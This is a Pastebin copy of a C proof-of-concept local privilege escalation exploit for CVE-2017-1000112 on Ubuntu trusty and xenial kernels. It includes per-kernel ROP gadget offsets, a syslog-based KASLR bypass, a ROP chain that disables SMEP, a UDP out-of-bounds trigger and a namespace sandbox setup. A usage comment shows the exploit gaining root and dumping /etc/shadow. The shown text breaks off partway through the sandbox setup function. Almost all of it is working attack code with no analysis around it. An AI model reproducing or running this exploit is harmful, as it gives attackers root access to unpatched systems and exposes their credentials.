SHARE
TWEET

Untitled

a guest Jun 20th, 2019 70 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // A proof-of-concept local root exploit for CVE-2017-1000112.
  2. // Includes KASLR and SMEP bypasses. No SMAP bypass.
  3. // Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.
  4. //
  5. // EDB Note: Also included the work from ~ https://ricklarabee.blogspot.co.uk/2017/12/adapting-poc-for-cve-2017-1000112-to.html
  6. //           Supports: Ubuntu Xenial (16.04) 4.4.0-81
  7. //
  8. // Usage:
  9. // user@ubuntu:~$ uname -a
  10. // Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
  11. // user@ubuntu:~$ whoami
  12. // user
  13. // user@ubuntu:~$ id
  14. // uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
  15. // user@ubuntu:~$ gcc pwn.c -o pwn
  16. // user@ubuntu:~$ ./pwn
  17. // [.] starting
  18. // [.] checking distro and kernel versions
  19. // [.] kernel version '4.8.0-58-generic' detected
  20. // [~] done, versions looks good
  21. // [.] checking SMEP and SMAP
  22. // [~] done, looks good
  23. // [.] setting up namespace sandbox
  24. // [~] done, namespace sandbox set up
  25. // [.] KASLR bypass enabled, getting kernel addr
  26. // [~] done, kernel text:   ffffffffae400000
  27. // [.] commit_creds:        ffffffffae4a5d20
  28. // [.] prepare_kernel_cred: ffffffffae4a6110
  29. // [.] SMEP bypass enabled, mmapping fake stack
  30. // [~] done, fake stack mmapped
  31. // [.] executing payload ffffffffae40008d
  32. // [~] done, should be root now
  33. // [.] checking if we got root
  34. // [+] got r00t ^_^
  35. // root@ubuntu:/home/user# whoami
  36. // root
  37. // root@ubuntu:/home/user# id
  38. // uid=0(root) gid=0(root) groups=0(root)
  39. // root@ubuntu:/home/user# cat /etc/shadow
  40. // root:!:17246:0:99999:7:::
  41. // daemon:*:17212:0:99999:7:::
  42. // bin:*:17212:0:99999:7:::
  43. // sys:*:17212:0:99999:7:::
  44. // ...
  45. //
  46. // EDB Note: Details ~ http://www.openwall.com/lists/oss-security/2017/08/13/1
  47. //
  48. // Andrey Konovalov <andreyknvl@gmail.com>
  49.  
  50. #define _GNU_SOURCE
  51.  
  52. #include <assert.h>
  53. #include <errno.h>
  54. #include <fcntl.h>
  55. #include <sched.h>
  56. #include <stdarg.h>
  57. #include <stdbool.h>
  58. #include <stdint.h>
  59. #include <stdio.h>
  60. #include <stdlib.h>
  61. #include <string.h>
  62. #include <unistd.h>
  63.  
  64. #include <linux/socket.h>
  65. #include <netinet/ip.h>
  66. #include <sys/klog.h>
  67. #include <sys/mman.h>
  68. #include <sys/utsname.h>
  69.  
  70. #define ENABLE_KASLR_BYPASS     1
  71. #define ENABLE_SMEP_BYPASS      1
  72.  
  73. // Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
  74. unsigned long KERNEL_BASE =     0xffffffff81000000ul;
  75.  
  76. // Will be overwritten by detect_versions().
  77. int kernel = -1;
  78.  
  79. struct kernel_info {
  80.     const char* distro;
  81.     const char* version;
  82.     uint64_t commit_creds;
  83.     uint64_t prepare_kernel_cred;
  84.     uint64_t xchg_eax_esp_ret;
  85.     uint64_t pop_rdi_ret;
  86.     uint64_t mov_dword_ptr_rdi_eax_ret;
  87.     uint64_t mov_rax_cr4_ret;
  88.     uint64_t neg_rax_ret;
  89.     uint64_t pop_rcx_ret;
  90.     uint64_t or_rax_rcx_ret;
  91.     uint64_t xchg_eax_edi_ret;
  92.     uint64_t mov_cr4_rdi_ret;
  93.     uint64_t jmp_rcx;
  94. };
  95.  
  96. struct kernel_info kernels[] = {
  97.     { "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
  98.     { "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
  99.     { "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
  100.     { "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
  101.     { "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
  102.     { "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
  103.     { "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
  104.     { "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
  105.     { "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
  106.     { "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
  107.     { "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
  108.     { "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
  109.     { "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
  110.     { "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  111.     { "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  112.     { "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  113.     { "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  114.     { "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  115.     { "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  116.     { "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  117.     { "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  118.     { "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  119.     { "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  120.     { "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  121.     { "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  122.     { "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
  123.     { "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
  124.     { "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
  125.     { "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
  126.     { "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
  127.     { "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
  128.     { "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
  129.     { "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
  130.     { "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
  131.     { "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  132.     { "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  133.     { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  134.     { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  135.     { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
  136.     { "xenial", "4.4.0-81-generic", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 }, 
  137. };
  138.  
  139. // Used to get root privileges.
  140. #define COMMIT_CREDS            (KERNEL_BASE + kernels[kernel].commit_creds)
  141. #define PREPARE_KERNEL_CRED     (KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
  142.  
  143. // Used when ENABLE_SMEP_BYPASS is used.
  144. // - xchg eax, esp ; ret
  145. // - pop rdi ; ret
  146. // - mov dword ptr [rdi], eax ; ret
  147. // - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
  148. // - neg rax ; ret
  149. // - pop rcx ; ret
  150. // - or rax, rcx ; ret
  151. // - xchg eax, edi ; ret
  152. // - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
  153. // - jmp rcx
  154. #define XCHG_EAX_ESP_RET        (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
  155. #define POP_RDI_RET         (KERNEL_BASE + kernels[kernel].pop_rdi_ret)
  156. #define MOV_DWORD_PTR_RDI_EAX_RET   (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
  157. #define MOV_RAX_CR4_RET         (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
  158. #define NEG_RAX_RET         (KERNEL_BASE + kernels[kernel].neg_rax_ret)
  159. #define POP_RCX_RET         (KERNEL_BASE + kernels[kernel].pop_rcx_ret)
  160. #define OR_RAX_RCX_RET          (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
  161. #define XCHG_EAX_EDI_RET        (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
  162. #define MOV_CR4_RDI_RET         (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
  163. #define JMP_RCX             (KERNEL_BASE + kernels[kernel].jmp_rcx)
  164.  
  165. // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
  166.  
  167. typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
  168. typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
  169.  
  170. void get_root(void) {
  171.     ((_commit_creds)(COMMIT_CREDS))(
  172.         ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
  173. }
  174.  
  175. // * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
  176.  
  177. uint64_t saved_esp;
  178.  
  179. // Unfortunately GCC does not support `__atribute__((naked))` on x86, which
  180. // can be used to omit a function's prologue, so I had to use this weird
  181. // wrapper hack as a workaround. Note: Clang does support it, which means it
  182. // has better support of GCC attributes than GCC itself. Funny.
  183. void wrapper() {
  184.     asm volatile ("                 \n\
  185.     payload:                    \n\
  186.         movq %%rbp, %%rax           \n\
  187.         movq $0xffffffff00000000, %%rdx     \n\
  188.         andq %%rdx, %%rax           \n\
  189.         movq %0, %%rdx              \n\
  190.         addq %%rdx, %%rax           \n\
  191.         movq %%rax, %%rsp           \n\
  192.         call get_root               \n\
  193.         ret                 \n\
  194.     " : : "m"(saved_esp) : );
  195. }
  196.  
  197. void payload();
  198.  
  199. #define CHAIN_SAVE_ESP              \
  200.     *stack++ = POP_RDI_RET;         \
  201.     *stack++ = (uint64_t)&saved_esp;    \
  202.     *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
  203.  
  204. #define SMEP_MASK 0x100000
  205.  
  206. #define CHAIN_DISABLE_SMEP          \
  207.     *stack++ = MOV_RAX_CR4_RET;     \
  208.     *stack++ = NEG_RAX_RET;         \
  209.     *stack++ = POP_RCX_RET;         \
  210.     *stack++ = SMEP_MASK;           \
  211.     *stack++ = OR_RAX_RCX_RET;      \
  212.     *stack++ = NEG_RAX_RET;         \
  213.     *stack++ = XCHG_EAX_EDI_RET;        \
  214.     *stack++ = MOV_CR4_RDI_RET;
  215.  
  216. #define CHAIN_JMP_PAYLOAD                     \
  217.     *stack++ = POP_RCX_RET;               \
  218.     *stack++ = (uint64_t)&payload;        \
  219.     *stack++ = JMP_RCX;
  220.  
  221. void mmap_stack() {
  222.     uint64_t stack_aligned, stack_addr;
  223.     int page_size, stack_size, stack_offset;
  224.     uint64_t* stack;
  225.  
  226.     page_size = getpagesize();
  227.  
  228.     stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
  229.     stack_addr = stack_aligned - page_size * 4;
  230.     stack_size = page_size * 8;
  231.     stack_offset = XCHG_EAX_ESP_RET % page_size;
  232.  
  233.     stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
  234.             MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  235.     if (stack == MAP_FAILED || stack != (void*)stack_addr) {
  236.         perror("[-] mmap()");
  237.         exit(EXIT_FAILURE);
  238.     }
  239.  
  240.     stack = (uint64_t*)((char*)stack_aligned + stack_offset);
  241.  
  242.     CHAIN_SAVE_ESP;
  243.     CHAIN_DISABLE_SMEP;
  244.     CHAIN_JMP_PAYLOAD;
  245. }
  246.  
  247. // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
  248.  
  249. #define SYSLOG_ACTION_READ_ALL 3
  250. #define SYSLOG_ACTION_SIZE_BUFFER 10
  251.  
  252. void mmap_syslog(char** buffer, int* size) {
  253.     *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
  254.     if (*size == -1) {
  255.         perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
  256.         exit(EXIT_FAILURE);
  257.     }
  258.  
  259.     *size = (*size / getpagesize() + 1) * getpagesize();
  260.     *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
  261.                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  262.  
  263.     *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
  264.     if (*size == -1) {
  265.         perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
  266.         exit(EXIT_FAILURE);
  267.     }
  268. }
  269.  
  270. unsigned long get_kernel_addr_trusty(char* buffer, int size) {
  271.     const char* needle1 = "Freeing unused";
  272.     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
  273.     if (substr == NULL) {
  274.         fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
  275.         exit(EXIT_FAILURE);
  276.     }
  277.  
  278.     int start = 0;
  279.     int end = 0;
  280.     for (end = start; substr[end] != '-'; end++);
  281.  
  282.     const char* needle2 = "ffffff";
  283.     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
  284.     if (substr == NULL) {
  285.         fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
  286.         exit(EXIT_FAILURE);
  287.     }
  288.  
  289.     char* endptr = &substr[16];
  290.     unsigned long r = strtoul(&substr[0], &endptr, 16);
  291.  
  292.     r &= 0xffffffffff000000ul;
  293.  
  294.     return r;
  295. }
  296.  
  297. unsigned long get_kernel_addr_xenial(char* buffer, int size) {
  298.     const char* needle1 = "Freeing unused";
  299.     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
  300.     if (substr == NULL) {
  301.         fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
  302.         exit(EXIT_FAILURE);
  303.     }
  304.  
  305.     int start = 0;
  306.     int end = 0;
  307.     for (start = 0; substr[start] != '-'; start++);
  308.     for (end = start; substr[end] != '\n'; end++);
  309.  
  310.     const char* needle2 = "ffffff";
  311.     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
  312.     if (substr == NULL) {
  313.         fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
  314.         exit(EXIT_FAILURE);
  315.     }
  316.  
  317.     char* endptr = &substr[16];
  318.     unsigned long r = strtoul(&substr[0], &endptr, 16);
  319.  
  320.     r &= 0xfffffffffff00000ul;
  321.     r -= 0x1000000ul;
  322.  
  323.     return r;
  324. }
  325.  
  326. unsigned long get_kernel_addr() {
  327.     char* syslog;
  328.     int size;
  329.     mmap_syslog(&syslog, &size);
  330.  
  331.     if (strcmp("trusty", kernels[kernel].distro) == 0 &&
  332.         strncmp("4.4.0", kernels[kernel].version, 5) == 0)
  333.         return get_kernel_addr_trusty(syslog, size);
  334.     if (strcmp("xenial", kernels[kernel].distro) == 0 &&
  335.         strncmp("4.4.0", kernels[kernel].version, 5) == 0 ||
  336.         strncmp("4.8.0", kernels[kernel].version, 5) == 0)
  337.         return get_kernel_addr_xenial(syslog, size);
  338.  
  339.     printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*");
  340.     exit(EXIT_FAILURE);
  341. }
  342.  
  343. // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
  344.  
  345. struct ubuf_info {
  346.     uint64_t callback;  // void (*callback)(struct ubuf_info *, bool)
  347.     uint64_t ctx;       // void *
  348.     uint64_t desc;      // unsigned long
  349. };
  350.  
  351. struct skb_shared_info {
  352.     uint8_t nr_frags;   // unsigned char
  353.     uint8_t tx_flags;   // __u8
  354.     uint16_t gso_size;  // unsigned short
  355.     uint16_t gso_segs;  // unsigned short
  356.     uint16_t gso_type;  // unsigned short
  357.     uint64_t frag_list; // struct sk_buff *
  358.     uint64_t hwtstamps; // struct skb_shared_hwtstamps
  359.     uint32_t tskey;     // u32
  360.     uint32_t ip6_frag_id;   // __be32
  361.     uint32_t dataref;   // atomic_t
  362.     uint64_t destructor_arg; // void *
  363.     uint8_t frags[16][17];  // skb_frag_t frags[MAX_SKB_FRAGS];
  364. };
  365.  
  366. struct ubuf_info ui;
  367.  
  368. void init_skb_buffer(char* buffer, unsigned long func) {
  369.     struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
  370.     memset(ssi, 0, sizeof(*ssi));
  371.  
  372.     ssi->tx_flags = 0xff;
  373.     ssi->destructor_arg = (uint64_t)&ui;
  374.     ssi->nr_frags = 0;
  375.     ssi->frag_list = 0;
  376.  
  377.     ui.callback = func;
  378. }
  379.  
  380. // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
  381.  
  382. #define SHINFO_OFFSET 3164
  383.  
  384. void oob_execute(unsigned long payload) {
  385.     char buffer[4096];
  386.     memset(&buffer[0], 0x42, 4096);
  387.     init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
  388.  
  389.     int s = socket(PF_INET, SOCK_DGRAM, 0);
  390.     if (s == -1) {
  391.         perror("[-] socket()");
  392.         exit(EXIT_FAILURE);
  393.     }
  394.  
  395.     struct sockaddr_in addr;
  396.     memset(&addr, 0, sizeof(addr));
  397.     addr.sin_family = AF_INET;
  398.     addr.sin_port = htons(8000);
  399.     addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  400.  
  401.     if (connect(s, (void*)&addr, sizeof(addr))) {
  402.         perror("[-] connect()");
  403.         exit(EXIT_FAILURE);
  404.     }
  405.  
  406.     int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
  407.     int rv = send(s, buffer, size, MSG_MORE);
  408.     if (rv != size) {
  409.         perror("[-] send()");
  410.         exit(EXIT_FAILURE);
  411.     }
  412.  
  413.     int val = 1;
  414.     rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
  415.     if (rv != 0) {
  416.         perror("[-] setsockopt(SO_NO_CHECK)");
  417.         exit(EXIT_FAILURE);
  418.     }
  419.  
  420.     send(s, buffer, 1, 0);
  421.  
  422.     close(s);
  423. }
  424.  
  425. // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
  426.  
  427. #define CHUNK_SIZE 1024
  428.  
  429. int read_file(const char* file, char* buffer, int max_length) {
  430.     int f = open(file, O_RDONLY);
  431.     if (f == -1)
  432.         return -1;
  433.     int bytes_read = 0;
  434.     while (true) {
  435.         int bytes_to_read = CHUNK_SIZE;
  436.         if (bytes_to_read > max_length - bytes_read)
  437.             bytes_to_read = max_length - bytes_read;
  438.         int rv = read(f, &buffer[bytes_read], bytes_to_read);
  439.         if (rv == -1)
  440.             return -1;
  441.         bytes_read += rv;
  442.         if (rv == 0)
  443.             return bytes_read;
  444.     }
  445. }
  446.  
  447. #define LSB_RELEASE_LENGTH 1024
  448.  
  449. void get_distro_codename(char* output, int max_length) {
  450.     char buffer[LSB_RELEASE_LENGTH];
  451.     int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH);
  452.     if (length == -1) {
  453.         perror("[-] open/read(/etc/lsb-release)");
  454.         exit(EXIT_FAILURE);
  455.     }
  456.     const char *needle = "DISTRIB_CODENAME=";
  457.     int needle_length = strlen(needle);
  458.     char* found = memmem(&buffer[0], length, needle, needle_length);
  459.     if (found == NULL) {
  460.         printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
  461.         exit(EXIT_FAILURE);
  462.     }
  463.     int i;
  464.     for (i = 0; found[needle_length + i] != '\n'; i++) {
  465.         assert(i < max_length);
  466.         assert((found - &buffer[0]) + needle_length + i < length);
  467.         output[i] = found[needle_length + i];
  468.     }
  469. }
  470.  
  471. void get_kernel_version(char* output, int max_length) {
  472.     struct utsname u;
  473.     int rv = uname(&u);
  474.     if (rv != 0) {
  475.         perror("[-] uname())");
  476.         exit(EXIT_FAILURE);
  477.     }
  478.     assert(strlen(u.release) <= max_length);
  479.     strcpy(&output[0], u.release);
  480. }
  481.  
  482. #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
  483.  
  484. #define DISTRO_CODENAME_LENGTH 32
  485. #define KERNEL_VERSION_LENGTH 32
  486.  
  487.  
  488. #define PROC_CPUINFO_LENGTH 4096
  489.  
  490. // 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
  491. int smap_smep_enabled() {
  492.     char buffer[PROC_CPUINFO_LENGTH];
  493.     int length = read_file("/proc/cpuinfo", &buffer[0], PROC_CPUINFO_LENGTH);
  494.     if (length == -1) {
  495.         perror("[-] open/read(/proc/cpuinfo)");
  496.         exit(EXIT_FAILURE);
  497.     }
  498.     int rv = 0;
  499.     char* found = memmem(&buffer[0], length, "smep", 4);
  500.     if (found != NULL)
  501.         rv += 1;
  502.     found = memmem(&buffer[0], length, "smap", 4);
  503.     if (found != NULL)
  504.         rv += 2;
  505.     return rv;
  506. }
  507.  
  508. void check_smep_smap() {
  509.     int rv = smap_smep_enabled();
  510.     if (rv >= 2) {
  511.         printf("[-] SMAP detected, no bypass available\n");
  512.         exit(EXIT_FAILURE);
  513.     }
  514. #if !ENABLE_SMEP_BYPASS
  515.     if (rv >= 1) {
  516.         printf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n");
  517.         exit(EXIT_FAILURE);
  518.     }
  519. #endif
  520. }
  521.  
  522. // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
  523.  
  524. static bool write_file(const char* file, const char* what, ...) {
  525.     char buf[1024];
  526.     va_list args;
  527.     va_start(args, what);
  528.     vsnprintf(buf, sizeof(buf), what, args);
  529.     va_end(args);
  530.     buf[sizeof(buf) - 1] = 0;
  531.     int len = strlen(buf);
  532.  
  533.     int fd = open(file, O_WRONLY | O_CLOEXEC);
  534.     if (fd == -1)
  535.         return false;
  536.     if (write(fd, buf, len) != len) {
  537.         close(fd);
  538.         return false;
  539.     }
  540.     close(fd);
  541.     return true;
  542. }
  543.  
  544. void setup_sandbox() {
  545.     int real_uid = getuid();
  546.     int real_gid = getgid();
  547.  
  548.     if (unshare(CLONE_NEWUSER) != 0) {
  549.         printf("[!] unprivileged user namespaces are not available\n");
  550.         perror("[-] unshare(CLONE_NEWUSER)");
  551.         exit(EXIT_FAILURE);
  552.     }
  553.     if (unshare(CLONE_NEWNET) != 0) {
  554.         perror("[-] unshare(CLONE_NEWUSER)");
  555.         exit(EXIT_FAILURE);
  556.     }
  557.  
  558.     if (!write_file("/proc/self/setgroups", "deny")) {
  559.         perror("[-] write_file(/proc/self/set_groups)");
  560.         exit(EXIT_FAILURE);
  561.     }
  562.     if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
  563.         perror("[-] write_file(/proc/self/uid_map)");
  564.         exit(EXIT_FAILURE);
  565.     }
  566.     if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
  567.         perror("[-] write_file(/proc/self/gid_map)");
  568.         exit(EXIT_FAILURE);
  569.     }
  570.  
  571.     cpu_set_t my_set;
  572.     CPU_ZERO(&my_set);
  573.     CPU_SET(0, &my_set);
  574.     if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
  575.         perror("[-] sched_setaffinity()");
  576.         exit(EXIT_FAILURE);
  577.     }
  578.  
  579.     if (system("/sbin/ifconfig lo mtu 1500") != 0) {
  580.         perror("[-] system(/sbin/ifconfig lo mtu 1500)");
  581.         exit(EXIT_FAILURE);
  582.     }
  583.     if (system("/sbin/ifconfig lo up") != 0) {
